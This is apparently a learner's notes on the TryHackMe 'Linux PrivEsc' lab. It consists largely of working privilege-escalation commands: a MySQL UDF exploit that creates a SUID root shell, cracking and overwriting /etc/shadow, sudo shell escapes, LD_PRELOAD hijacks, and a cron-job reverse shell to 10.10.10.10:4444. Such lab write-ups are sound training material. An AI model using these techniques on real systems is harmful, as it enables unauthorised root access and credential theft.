Day 1 — Linux PrivEsc

Today is my Day 1 and I am going to solve machine named Linux PrivEsc on TryHackMe lets goo!!!!

misconfigured Debian VM with multiple ways to get root! SSH is available. Credentials: user:password321

Service Exploits

using nmap

open ports

cd /home/user/tools/mysql-udf
gcc -g -c  raptor_udf2.c  -fPIC
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

I found misconfiger in sql login with out password

Execute the following commands on the MySQL shell to create a User Defined Function (UDF) "do_system" using our compiled exploit:

A user-defined function (UDF) is a function provided by the user of a program or environment, in a context where the usual assumption is that functions are built into the program or environment. UDFs are usually written for the requirement of its creator.

mysql -u root

use mysql;
create table foo(line blob);
insert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';

What is BLOB in MySQL?

BLOB, which stands for a Binary Large Object, is a MySQL data type that can store images, PDF files, multimedia, and other types of binary data.

Use the function to copy /bin/bash to /tmp/rootbash and set the SUID permission:

select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');
/tmp/rootbash -p

SERVICE EXPLOIT

Weak File Permissions - Readable /etc/shadow

Read only => r

ll /etc/shadow
cat /etc/shadow
#hash root in file using nano
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

What hashing algorithm was used to produce the root user's password hash?

cat hash | hashid

SHA-512 Crypt

Weak File Permissions - Writable /etc/shadow

Write only

ll /etc/shadow
cat /etc/shadow
mkpasswd -m sha-512 newpasswordhere #=> read only
or 
openssl passwd newpasswordhere => #wite only
su root

Generate a new password hash with a password of your choice:

mkpasswd -m sha-512 newpasswordhere

openssl passwd newpasswordhere

Sudo - Shell Escape Sequences

Visit GTFOBins (https://gtfobins.github.io) and search for some of the program names. If the program is listed with “sudo” as a function, you can use it to elevate privileges, usually via an escape sequence.

#vim
sudo vim -c ':!/bin/bash'

#nano 
sudo nano -s /bin/bash
/bin/bash
^T
#apache2
sudo apache2 -f /etc/shadow #=> crack the hash and gain the root

Task 7 — Sudo — Environment Variables

Using LD_PRELOAD

 gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /home/user/tools/sudo/preload.c
 sudo LD_PRELOAD=/tmp/preload.so apache2

ldd /usr/sbin/apache2

gcc -o /tmp/libcrypt.so.1 -shared -fPIC /home/user/tools/sudo/library_path.c
sudo LD_LIBRARY_PATH=/tmp apache2

Cron Jobs - File Permissions

cat /etc/cronta

#!/bin/bash
bash -i >& /dev/tcp/10.10.10.10/4444 0>&1

using nc in kali

nc -nvlp 4444

Cron Jobs - PATH Environment Variable

Note that the PATH variable starts with /home/user which is our user's home directory.

Create a file called overwrite.sh in your home directory with the following contents:

cat /etc/crontab

#!/bin/bash

cp /bin/bash /tmp/rootbash
chmod +xs /tmp/rootbash

chmod +x /home/user/overwrite.sh

/tmp/rootbash -p